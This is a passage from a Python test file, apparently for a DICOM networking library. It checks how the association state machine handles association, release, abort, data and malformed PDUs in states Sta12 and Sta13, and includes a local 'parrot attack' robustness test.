assert fsm._changes[:6] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
("Sta3", "Evt7", "AE-7"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta10", "Evt13", "AR-10"),
]
assert fsm._events[:7] == [
"Evt5",
"Evt6",
"Evt7",
"Evt11",
"Evt12",
"Evt13",
"Evt7",
]
def test_evt08(self):
"""Test Sta12 + Evt8."""
# Sta12 + Evt8 -> <ignore> -> Sta12
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
("send", a_associate_rq),
("recv", None), # recv a-associate-rq
("recv", None), # recv a-release-rq
("send", a_release_rq), # collide
("send", a_release_rp),
("exit", None),
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_associate("reject"))
scp.step()
scp.shutdown()
assert fsm._transitions[:6] == [
"Sta2",
"Sta3",
"Sta6",
"Sta7",
"Sta10",
"Sta12",
]
assert fsm._changes[:6] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
("Sta3", "Evt7", "AE-7"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta10", "Evt13", "AR-10"),
]
assert fsm._events[:7] == [
"Evt5",
"Evt6",
"Evt7",
"Evt11",
"Evt12",
"Evt13",
"Evt8",
]
def test_evt09(self):
"""Test Sta12 + Evt9."""
# Sta12 + Evt9 -> <ignore> -> Sta12
# Evt9: Receive P-DATA primitive from <local user>
commands = [
("send", a_associate_rq),
("recv", None), # recv a-associate-rq
("recv", None), # recv a-release-rq
("send", a_release_rq), # collide
("send", a_release_rp),
("exit", None),
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_pdata())
scp.step()
scp.shutdown()
assert fsm._transitions[:6] == [
"Sta2",
"Sta3",
"Sta6",
"Sta7",
"Sta10",
"Sta12",
]
assert fsm._changes[:6] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
("Sta3", "Evt7", "AE-7"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta10", "Evt13", "AR-10"),
]
assert fsm._events[:7] == [
"Evt5",
"Evt6",
"Evt7",
"Evt11",
"Evt12",
"Evt13",
"Evt9",
]
def test_evt10(self):
"""Test Sta12 + Evt10."""
# Sta12 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("send", a_associate_rq),
("recv", None), # recv a-associate-rq
("recv", None), # recv a-release-rq
("send", a_release_rq), # collide
("send", a_release_rp),
("send", p_data_tf), # trigger event
("recv", None), # recv a-abort
("exit", None),
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:6] == [
"Sta2",
"Sta3",
"Sta6",
"Sta7",
"Sta10",
"Sta12",
]
assert fsm._changes[:7] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
("Sta3", "Evt7", "AE-7"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta10", "Evt13", "AR-10"),
("Sta12", "Evt10", "AA-8"),
]
assert fsm._events[:7] == [
"Evt5",
"Evt6",
"Evt7",
"Evt11",
"Evt12",
"Evt13",
"Evt10",
]
assert scp.handlers[0].received[2] == (
b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
)
def test_evt11(self):
"""Test Sta12 + Evt11."""
# Sta12 + Evt11 -> <ignore> -> Sta12
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
("send", a_associate_rq),
("recv", None), # recv a-associate-rq
("recv", None), # recv a-release-rq
("send", a_release_rq), # collide
("send", a_release_rp),
("exit", None),
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_release(False))
scp.step()
scp.shutdown()
assert fsm._transitions[:6] == [
"Sta2",
"Sta3",
"Sta6",
"Sta7",
"Sta10",
"Sta12",
]
assert fsm._changes[:6] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
("Sta3", "Evt7", "AE-7"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta10", "Evt13", "AR-10"),
]
assert fsm._events[:7] == [
"Evt5",
"Evt6",
"Evt7",
"Evt11",
"Evt12",
"Evt13",
"Evt11",
]
def test_evt12(self):
"""Test Sta12 + Evt12."""
# Sta12 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("send", a_associate_rq),
("recv", None), # recv a-associate-rq
("recv", None), # recv a-release-rq
("send", a_release_rq), # collide
("send", a_release_rp),
("send", a_release_rq), # trigger event
("recv", None), # recv a-abort
("exit", None),
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:6] == [
"Sta2",
"Sta3",
"Sta6",
"Sta7",
"Sta10",
"Sta12",
]
assert fsm._changes[:7] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
("Sta3", "Evt7", "AE-7"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta10", "Evt13", "AR-10"),
("Sta12", "Evt12", "AA-8"),
]
assert fsm._events[:7] == [
"Evt5",
"Evt6",
"Evt7",
"Evt11",
"Evt12",
"Evt13",
"Evt12",
]
assert scp.handlers[0].received[2] == (
b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
)
def test_evt13(self):
"""Test Sta12 + Evt13."""
# Sta12 + Evt13 -> AA-8 -> Sta1
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("send", a_associate_rq),
("recv", None), # recv a-associate-rq
("recv", None), # recv a-release-rq
("send", a_release_rq), # collide
("send", a_release_rp),
("send", a_release_rp), # trigger event
("recv", None), # recv a-abort
("exit", None),
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:6] == [
"Sta2",
"Sta3",
"Sta6",
"Sta7",
"Sta10",
"Sta12",
]
assert fsm._changes[:7] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
("Sta3", "Evt7", "AE-7"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta10", "Evt13", "AR-10"),
("Sta12", "Evt13", "AA-8"),
]
assert fsm._events[:7] == [
"Evt5",
"Evt6",
"Evt7",
"Evt11",
"Evt12",
"Evt13",
"Evt13",
]
assert scp.handlers[0].received[2] == (
b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
)
def test_evt14(self):
"""Test Sta12 + Evt14."""
# Sta12 + Evt14 -> AR-4 -> Sta12
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
# AR-4: Issue A-RELEASE-RP PDU and start ARTIM
commands = [
("send", a_associate_rq),
("recv", None), # recv a-associate-rq
("recv", None), # recv a-release-rq
("send", a_release_rq), # collide
("send", a_release_rp),
("recv", None), # recv a-release-rp
("exit", None),
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_release(True))
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:6] == [
"Sta2",
"Sta3",
"Sta6",
"Sta7",
"Sta10",
"Sta12",
]
assert fsm._changes[:7] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
("Sta3", "Evt7", "AE-7"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta10", "Evt13", "AR-10"),
("Sta12", "Evt14", "AR-4"),
]
assert fsm._events[:7] == [
"Evt5",
"Evt6",
"Evt7",
"Evt11",
"Evt12",
"Evt13",
"Evt14",
]
assert scp.handlers[0].received[2] == (
b"\x06\x00\x00\x00\x00\x04\x00\x00\x00\x00"
)
def test_evt15(self):
"""Test Sta12 + Evt15."""
# Sta12 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU to <remote>, start ARTIM
commands = [
("send", a_associate_rq),
("recv", None), # recv a-associate-rq
("recv", None), # recv a-release-rq
("send", a_release_rq), # collide
("send", a_release_rp),
("recv", None), # recv a-abort
("exit", None),
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_abort())
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:6] == [
"Sta2",
"Sta3",
"Sta6",
"Sta7",
"Sta10",
"Sta12",
]
assert fsm._changes[:7] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
("Sta3", "Evt7", "AE-7"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta10", "Evt13", "AR-10"),
("Sta12", "Evt15", "AA-1"),
]
assert fsm._events[:7] == [
"Evt5",
"Evt6",
"Evt7",
"Evt11",
"Evt12",
"Evt13",
"Evt15",
]
assert scp.handlers[0].received[2] == (
b"\x07\x00\x00\x00\x00\x04\x00\x00\x00\x00"
)
def test_evt16(self):
"""Test Sta12 + Evt16."""
# Sta12 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT primitive, close connection
commands = [
("send", a_associate_rq),
("recv", None), # recv a-associate-rq
("recv", None), # recv a-release-rq
("send", a_release_rq), # collide
("send", a_release_rp),
("send", a_abort), # trigger event
("exit", None),
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:6] == [
"Sta2",
"Sta3",
"Sta6",
"Sta7",
"Sta10",
"Sta12",
]
assert fsm._changes[:7] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
("Sta3", "Evt7", "AE-7"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta10", "Evt13", "AR-10"),
("Sta12", "Evt16", "AA-3"),
]
assert fsm._events[:7] == [
"Evt5",
"Evt6",
"Evt7",
"Evt11",
"Evt12",
"Evt13",
"Evt16",
]
def test_evt17(self):
"""Test Sta12 + Evt17."""
# Sta12 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
("send", a_associate_rq),
("recv", None), # recv a-associate-rq
("recv", None), # recv a-release-rq
("send", a_release_rq), # collide
("send", a_release_rp),
("exit", None),
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.shutdown()
time.sleep(0.5)
assert fsm._transitions[:6] == [
"Sta2",
"Sta3",
"Sta6",
"Sta7",
"Sta10",
"Sta12",
]
assert fsm._changes[:7] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
("Sta3", "Evt7", "AE-7"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta10", "Evt13", "AR-10"),
("Sta12", "Evt17", "AA-4"),
]
assert fsm._events[:7] == [
"Evt5",
"Evt6",
"Evt7",
"Evt11",
"Evt12",
"Evt13",
"Evt17",
]
def test_evt18(self):
"""Test Sta12 + Evt18."""
# Sta12 + Evt18 -> <ignore> -> Sta12
# Evt18: ARTIM timer expired from <local service>
commands = [
("send", a_associate_rq),
("recv", None), # recv a-associate-rq
("recv", None), # recv a-release-rq
("send", a_release_rq), # collide
("send", a_release_rp),
("exit", None),
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.artim_timer.timeout = 0.05
assoc.dul.artim_timer.start()
time.sleep(0.5)
scp.step()
scp.shutdown()
assert fsm._transitions[:6] == [
"Sta2",
"Sta3",
"Sta6",
"Sta7",
"Sta10",
"Sta12",
]
assert fsm._changes[:7] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
("Sta3", "Evt7", "AE-7"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta10", "Evt13", "AR-10"),
]
assert fsm._events[:7] == [
"Evt5",
"Evt6",
"Evt7",
"Evt11",
"Evt12",
"Evt13",
"Evt18",
]
def test_evt19(self):
"""Test Sta12 + Evt19."""
# Sta12 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("send", a_associate_rq),
("recv", None), # recv a-associate-rq
("recv", None), # recv a-release-rq
("send", a_release_rq), # collide
("send", a_release_rp),
("send", b"\x08\x00\x00\x00\x00\x00\x00\x00"), # trigger event
("recv", None), # recv a-abort
("exit", None),
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:6] == [
"Sta2",
"Sta3",
"Sta6",
"Sta7",
"Sta10",
"Sta12",
]
assert fsm._changes[:7] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
("Sta3", "Evt7", "AE-7"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta10", "Evt13", "AR-10"),
("Sta12", "Evt19", "AA-8"),
]
assert fsm._events[:7] == [
"Evt5",
"Evt6",
"Evt7",
"Evt11",
"Evt12",
"Evt13",
"Evt19",
]
assert scp.handlers[0].received[2] == (
b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
)
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState13(TestStateBase):
"""Tests for State 13: Waiting for connection closed."""
def move_to_state(self, assoc, scp):
def patch_neg_rq():
"""Override ACSE._negotiate_as_requestor"""
assoc.acse.send_request()
assoc.acse._negotiate_as_requestor = patch_neg_rq
orig_method = assoc.dul._is_transport_event
def patch_xport_event():
"""Override DUL._is_transport_event to not close in Sta13."""
if self.fsm.current_state == "Sta13":
if assoc.dul.socket and assoc.dul.socket.ready:
assoc.dul._read_pdu_data()
return True
return False
return orig_method()
assoc.dul._is_transport_event = patch_xport_event
assoc.start()
scp.step()
scp.step()
self.wait_on_state(assoc.dul.state_machine, "Sta13")
def test_evt01(self):
"""Test Sta13 + Evt1."""
# Sta13 + Evt1 -> <ignore> -> Sta13
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
("recv", None),
("send", a_associate_rq),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate("request"))
scp.step()
scp.shutdown()
self.assoc.dul.socket.close()
assert self.fsm._changes[:3] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt6", "AA-8"),
]
assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta13"]
assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt6", "Evt1"]
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta13 + Evt2."""
# Sta13 + Evt2 -> <ignore> -> Sta13
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta13 + Evt3."""
# Sta13 + Evt3 -> AA-6 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-6: Ignore PDU
commands = [
("recv", None),
("send", a_associate_rq),
("send", a_associate_ac),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
self.assoc.dul.socket.close()
assert self.fsm._changes[:4] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt6", "AA-8"),
("Sta13", "Evt3", "AA-6"),
]
assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta13"]
assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt6", "Evt3"]
def test_evt04(self):
"""Test Sta13 + Evt4."""
# Sta13 + Evt4 -> AA-6 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-6: Ignore PDU
commands = [
("recv", None),
("send", a_associate_rq),
("send", a_associate_rj),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt6", "AA-8"),
("Sta13", "Evt4", "AA-6"),
]
assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta13"]
assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt6", "Evt4"]
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta13 + Evt5."""
# Sta13 + Evt5 -> <ignore> -> Sta13
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta13 + Evt6."""
# Sta13 + Evt6 -> AA-7 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-7: Send A-ABORT PDU to <remote>
commands = [
("recv", None),
("send", a_associate_rq),
("send", a_associate_rq),
("recv", None),
("recv", None),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.step()
scp.shutdown()
pdu = A_ABORT_RQ()
pdu.decode(scp.received[2])
assert pdu.source == 2
assert pdu.reason_diagnostic == 2
assert self.fsm._changes[:4] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt6", "AA-8"),
("Sta13", "Evt6", "AA-7"),
]
assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta13"]
assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt6", "Evt6"]
def test_evt07(self):
"""Test Sta13 + Evt7."""
# Sta13 + Evt7 -> <ignore> -> Sta13
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
("recv", None),
("send", a_associate_rq),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate("accept"))
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt6", "AA-8"),
]
assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta13"]
assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt6", "Evt7"]
def test_evt08(self):
"""Test Sta13 + Evt8."""
# Sta13 + Evt8 -> <ignore> -> Sta13
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
("recv", None),
("send", a_associate_rq),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate("reject"))
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt6", "AA-8"),
]
assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta13"]
assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt6", "Evt8"]
def test_evt09(self):
"""Test Sta13 + Evt9."""
# Sta13 + Evt9 -> <ignore> -> Sta13
# Evt9: Receive P-DATA primitive from <local user>
commands = [
("recv", None),
("send", a_associate_rq),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_pdata())
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt6", "AA-8"),
]
assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta13"]
assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt6", "Evt9"]
def test_evt10(self):
"""Test Sta13 + Evt10."""
# Sta13 + Evt10 -> AA-6 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-6: Ignore PDU
commands = [
("recv", None),
("send", a_associate_rq),
("send", p_data_tf),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt6", "AA-8"),
("Sta13", "Evt10", "AA-6"),
]
assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta13"]
assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt6", "Evt10"]
def test_evt11(self):
"""Test Sta13 + Evt11."""
# Sta13 + Evt11 -> <ignore> -> Sta13
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
("recv", None),
("send", a_associate_rq),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(False))
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt6", "AA-8"),
]
assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta13"]
assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt6", "Evt11"]
def test_evt12(self):
"""Test Sta13 + Evt12."""
# Sta13 + Evt12 -> AA-6 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-6: Ignore PDU
commands = [
("recv", None),
("send", a_associate_rq),
("send", a_release_rq),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt6", "AA-8"),
("Sta13", "Evt12", "AA-6"),
]
assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta13"]
assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt6", "Evt12"]
def test_evt13(self):
"""Test Sta13 + Evt13."""
# Sta13 + Evt13 -> AA-6 -> Sta1
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-6: Ignore PDU
commands = [
("recv", None),
("send", a_associate_rq),
("send", a_release_rp),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt6", "AA-8"),
("Sta13", "Evt13", "AA-6"),
]
assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta13"]
assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt6", "Evt13"]
def test_evt14(self):
"""Test Sta13 + Evt14."""
# Sta13 + Evt14 -> <ignore> -> Sta13
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
("recv", None),
("send", a_associate_rq),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(True))
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt6", "AA-8"),
]
assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta13"]
assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt6", "Evt14"]
def test_evt15(self):
"""Test Sta13 + Evt15."""
# Sta13 + Evt15 -> <ignore> -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
commands = [
("recv", None),
("send", a_associate_rq),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_abort())
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt6", "AA-8"),
]
assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta13"]
assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt6", "Evt15"]
def test_evt16(self):
"""Test Sta13 + Evt16."""
# Sta13 + Evt16 -> AA-2 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-2: Stop ARTIM, close connection
commands = [
("recv", None),
("send", a_associate_rq),
("send", a_abort),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt6", "AA-8"),
("Sta13", "Evt16", "AA-2"),
]
assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta13"]
assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt6", "Evt16"]
def test_evt17(self):
"""Test Sta13 + Evt17."""
# Sta13 + Evt17 -> AR-5 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AR-5: Stop ARTIM
commands = [
("recv", None),
("send", a_associate_rq),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.shutdown()
time.sleep(0.5)
assert self.fsm._changes[:4] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt6", "AA-8"),
("Sta13", "Evt17", "AR-5"),
]
assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta13"]
assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt6", "Evt17"]
def test_evt18(self):
"""Test Sta13 + Evt18."""
# Sta13 + Evt18 -> AA-2 -> Sta1
# Evt18: ARTIM timer expired from <local service>
# AA-2: Stop ARTIM, close connection
commands = [
("recv", None),
("send", a_associate_rq),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.5)
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt6", "AA-8"),
("Sta13", "Evt18", "AA-2"),
]
assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta13"]
assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt6", "Evt18"]
def test_evt19(self):
"""Test Sta13 + Evt19."""
# Sta13 + Evt19 -> AA-7 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-7: Send A-ABORT PDU to <remote>
commands = [
("recv", None),
("send", a_associate_rq),
("send", b"\x08\x00\x00\x00\x00\x00\x00\x00"),
("recv", None),
("recv", None),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.step()
scp.shutdown()
pdu = A_ABORT_RQ()
pdu.decode(scp.received[2])
assert pdu.source == 2
assert pdu.reason_diagnostic == 2
assert self.fsm._changes[:4] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt6", "AA-8"),
("Sta13", "Evt19", "AA-7"),
]
assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta13"]
assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt6", "Evt19"]
class TestParrotAttack(TestStateBase):
"""Test a parrot attack on the association."""
def test_requestor(self):
commands = [
("recv", None),
("send", a_associate_ac),
("send", p_data_tf),
("send", p_data_tf),
("send", p_data_tf),
("send", p_data_tf),
("send", p_data_tf),
("send", p_data_tf),
("send", p_data_tf),
("send", p_data_tf),
("send", a_release_rq),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.assoc.start()
for ii in range(len(commands)):
scp.step()
scp.shutdown()
assert self.fsm._changes[:14] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt10", "DT-2"),
("Sta6", "Evt10", "DT-2"),
("Sta6", "Evt10", "DT-2"),
("Sta6", "Evt10", "DT-2"),
("Sta6", "Evt10", "DT-2"),
("Sta6", "Evt10", "DT-2"),
("Sta6", "Evt10", "DT-2"),
("Sta6", "Evt10", "DT-2"),
("Sta6", "Evt12", "AR-2"),
("Sta8", "Evt14", "AR-4"),
("Sta13", "Evt17", "AR-5"),
]
def test_acceptor(self):
"""Test hitting the acceptor with PDUs."""
# Also a regression test for #120
# C-ECHO-RQ
# 80 total length
echo_rq = (
b"\x04\x00\x00\x00\x00\x4a" # P-DATA-TF 74
